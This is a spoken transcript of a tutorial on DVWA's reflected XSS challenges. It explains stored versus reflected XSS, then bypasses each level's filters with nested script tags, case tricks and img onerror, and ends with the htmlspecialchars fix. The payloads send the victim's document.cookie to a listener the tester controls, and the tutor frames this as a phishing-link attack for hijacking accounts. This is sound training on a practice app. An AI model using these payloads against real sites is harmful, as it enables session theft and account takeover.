In this video we'll be going through the reflected cross-site scripting challenges on DVWA. So we've got a security level set to low as usual, and let's before we check out the help, let's check out one of these links. Let's go to the first one, and we just went through the DOM-based cross-site scripting. See here that we have our main categories of cross-site scripting are stored and reflected. So we have this DOM-based, less well known. We covered that first for some reason because it's that way on DVWA. Stored attacks we'll be covering next. We're doing reflected at the moment, but basically the difference between these is as it sounds. If we do a stored XSS attack, we're injecting some JavaScript code which is then going to be stored on the server, or it's going to be stored somewhere. So you've got some examples here like a message forum, visitor log, comment field, something like that. And then every time a new victim loads that page, that malicious script will be executed. A reflected XSS attack is one where the injected script is reflected off the server, such as an error message, search result, something like that. But it's not stored. So we have here reflected attacks are delivered to victims via another route, such as an email method or some other, or on some other website. So obviously, the stored XSS attacks, you can probably imagine that this is quite a bit more serious. If we were able to, if we take an example, let's say if we have a big site, let's look at Facebook for example, or well, let's say MySpace. I think MySpace was hit by a pretty bad XSS attack back in the day, which turned into a worm. So let's say we're on MySpace. If we have a XSS vulnerability, we're doing a reflected attack. We might craft a URL to send to a victim, and whenever they open that URL, it will take their cookie from MySpace and it'll send it to our web server. So we would send that out in like a phishing email or something like that, and that's a way for us to gain access to that user's account. If it was a stored XSS attack, we could potentially leave a comment on a profile. Let's say it might be our profile, it might be a victim's profile, or it might be a general MySpace page, and then anytime anybody visits that page, the attack will occur. So the potential to hack a lot more victims essentially is there with the stored XSS attack. So probably went into a bit more detail than I need to there. The important thing to note is that for these challenges that we're doing now, these are reflected XSS attacks, so we'll assume that whatever attacks we come up with here will be sending that kind of crafted URL to a victim, also called non-persistent or type 2. Okay, so now we've got a little idea what that's about. In fact, just before we go to our low challenge as well, we could have a look at PortSwigger, do a bit more background info. You can see we have our from our last exercise, we have our cross-site scripting cheat sheet open, so we'll try and make some use of that. But yeah, reflected XSS arises when an application receives data in a HTTP request and includes that data within the immediate response in an unsafe way. So the key word there is immediate response. Plenty of exercises here, well worth going through. I'll try and cover them at some point on this channel. But with the background being done, let's have a look at the help section. Help section gives us a bit of background here as well. But the key point, because it's reflected, the malicious code is not stored on the remote web application, so it requires some social engineering. So we need to basically send the link via an email or something like that. And one way or another, we need to steal the cookie of a logged-in user. For the low level, it's not going to check the requested input before including it in the output text. Have a look at the source code here and see what's going on. So we have no XSS protection. You can see there's actually a header for XSS protection, which is specifically being set to 0 to allow this to happen. And then whatever we input as the name is going to be inserted into this. It's going to be echoed through in this feedback to the end user. So let's see if we can exploit it. So it asks us for our name. Let's put in a name, see what happens. If we submit that, we get it's reflected to the page. It says hello crypto. We can view the page source and see that we have these pre-tags where it's inserted our name, crypto. So let's try and do a script. Let's put in our script tags. And then inside our script tags, let's say alert, you have been hacked. And if we submit that, we get the message pops up on the screen. Let's view the source code. And in here we'll see that inside of the pre-tags we also now have these fully formed script tags with our script inside it, which then was executed whenever the HTML page was interpreted. So we could change that and say, as we've been asked to do, we've been asked to get our document.cookie. So we could do that, submit that, we get a cookie. The issue is, what we've been told to do is use a social engineering attack and send this link to a victim. They'll open the link and then it'll pop up on the screen with their cookie, and then they'll just presumably close the window and move on. And we don't have their cookie. So we could get over that by saying let's do our script tags here, and instead of an alert we could say set the window location, window.location equal to, and let's give it an address of our web server here. So you can start web server, do python-m, and then if it's Python 2 you'll do simple HTTP server like that. If it's Python 3 do if it's Python 3 do http.server, and then give it a port number. We'll give it 1337, and in here I'm going to give it this address 127.0.0.1 port 1337, and then we'll say the cookie parameter is equal to plus document.cookie. We've already got that tag in there, so there we go. That's looking good to me. So all we're doing here, let me paste this up here just so you can see it a little bit better. All we're doing here is saying set the window location, so redirect the page to our web server, and request this web server with the parameter cookie, and you're setting the cookie to your cookie. So if we run this, submit, you see it's redirected us to 127.0.0.1 at 1337, and we have our cookie here. So it's tried to request this page, it said files not found, but it has sent us the user's cookie, so now we could use this to go and log into their site. So there are ways to do that without the page redirecting, potentially using like image source, an image on error, as we had done in the last example. We used the image on error. One thing to bear in mind, if it's an error, if it's an on error alert, it'll keep making the request every time the page reloads, every time the page refreshes, so it can kind of get stuck in a bit of a loop. But there we go, we've taken the cookie. Let's move on to the medium difficulty and see what sort of security features have been implemented. So if we check the help this time, and we'll see that the medium level developer has tried to add simple pattern matching to remove any references to script in order to disable any JavaScript. So let's see what the developer's done. They have okay, my difficulty is still on low apparently. Oh, the difficulty is on medium, right? Mustn't have refreshed this page. That's interesting. The security level's on medium until you go to reflected, and then it's on low. Let me delete the cookie there. I'm gonna. Oh yeah, we have two cookies. We have one set for medium and one set for low. Let's delete the low one. Let's go back to stored, go back to reflected, and there we go. It's on medium now. Okay, so if you run into that problem, you can check your cookies. What's changed? We now have this string replace, where we're going to replace all instances of the word script. So there's a few ways we could solve this. Looking at that at a glance, some of them we used actually earlier in CSRF maybe. I'm trying to think. There was another one we used it in. I don't think it was XSS. But let's look at some possibilities. Let's try and just submit our alert like last time. See, alert you've been hacked. If we go to our source, we can just see now we have this script alert. Okay, there we go. I'm going to say that looked like it should have executed. So it's removed the script tag. It hasn't removed the / script tag, but obviously it's not a valid script because it's not fully formed. So, a couple of options. It didn't appear to be checking the case, so presumably we can just say alert document.cookie, and it wasn't checking the case of this closing script tag. So presumably you can still just do that in lowercase. Let's submit. Yep, that's fine. Another way we could do this, as we had done in a previous example. Let me take a copy of this and open it in Sublime just so you can see it a little clearer. So we have this script alert you've been hacked. Now this script tag is going to be removed, but if we were to put in here script, what's going to happen here? It's going to run through, it's going to say, oh, there's an instance of script, delete that, and then move on. And what's it left with? It's left with our original script. So let's take that and paste it in here, submit that, and you see you've been hacked. If we check our source code, we can see that we've got a fully formed script here. We could also potentially use other events. So we have all these different types of events. We don't have to use script tags. There's a lot of different things we can use here. Sorry, these are tags. These are the events in the middle. And is that copy events? Yeah, these are our events. I got confused there because we have payloads, events, tags, but it's like tags, events, browsers. I guess the payloads are these down here. So that's another possibility there anyway. And just as a reminder, the difference, if we send this link to, so the difference between our reflected and the stored that we're working on here, or that we will be working on in the next video, if this was a stored vulnerability and somebody came back to this page and simply went to this page, every time anybody went to this page, that code would run if it was stored here somewhere. So if there was like a message board or something like that. Whereas we have to supply the victim with a link which has this script on it, otherwise it's not going to execute. And there we go, and we can just change that then to the document.cookie. And just as last time, we could go ahead and say we don't want to alert here, we want to set the document dot or the window dot location equal to HTTP 127.0.0.1 1337, and then cookie equals plus document dot cookie. We send that to the victim. Oh, we didn't have our HTTP server running, so let's do it again. We send that to the victim, and it should have executed. Let me grab that, paste that in here. Say / script. It all looks okay to me. Submit. Yeah, there we go. And there we've got our cookie. Okay, so all that's working. Let's go and check out the high difficulty and see what the developers messed up this time. So view the help, and oh, I accidentally clicked on something. View the help, see what they've enabled here. The developer now believes they can disable all JavaScript by removing the pattern script. Okay, let's view the source and see how they've done that. And they've said remove. Okay. So, I mean, that will remove white space, so it's going to stop us from being able to, if they had removed the script tag, we could potentially have said like that sort of thing. So yeah, it'll block that from happening, but presumably with our previous example there, the script, let's do this. Alert. What if we do the script like this? Let's try it out. Submit. Hello. Okay. View page source. Okay, it removed all of that. Okay, okay. Well, let's go ahead and try. Let me check the source there again. Yeah, okay. And it's case sensitive as well. So let's go ahead and use one of our handlers from here. So we have our image one as an example. We don't want a script. We don't want a script tag. Why are the script tags there? Image. We'll say image. All events. And let's check this one out. I'm gonna grab a copy. Oh, that's Internet Explorer. I'm working in Firefox. Fires after a script. We don't want a script tag. Okay. Fires when CSS animation ends. Let's try this one. Paste that in, submit, and we get 1. Okay. Paste that in again. So this is just saying image source, and there is no image source, and then it's saying on error, which there will be an error because we haven't provided a source. Send this alert, and we're going to say actually send the alert as document.cookie, and then obviously we could use the same procedure then to send that to our local server. So that's the high level bypass. Let's go to our impossible and see how they fix this. Go to XSS reflected and have a look at the help. First of all, we'll see that using inbuilt PHP functions such as HTML special chars, it's possible to escape any values which would alter the behavior of the input. Check the source code, and we'll see that it's checking a user token to begin with. So it's checking the CSRF token, and it's also using this HTML special chars in anything that we put in there. So let's try and put in a script. Let's even try the one where it did the script inside of a script. We'll submit that, and you can see it's printed out in text, but if we go and view the source code, let's have a look. Oh, we have CSRF token is incorrect. Is that? Okay. Let's try again. Script alert, you've been hacked. Send. The CSRF token is incorrect again. Okay, view source. CSRF token is incorrect. Okay, I was interested in seeing this actually printed to the page there, but it's not. Let's inspect the element. And we have this pre here, which has a. Yeah, that's interesting that there's just no. You're not able to view the source there. But okay, it printed that securely anyway. Obviously, it's printed it out as text, even though the script tags are there. It's not being interpreted as a script, and it's not printed out. So the vulnerability is gone. Alright, I hope you've enjoyed this video. Let's move on to the XSS stored category.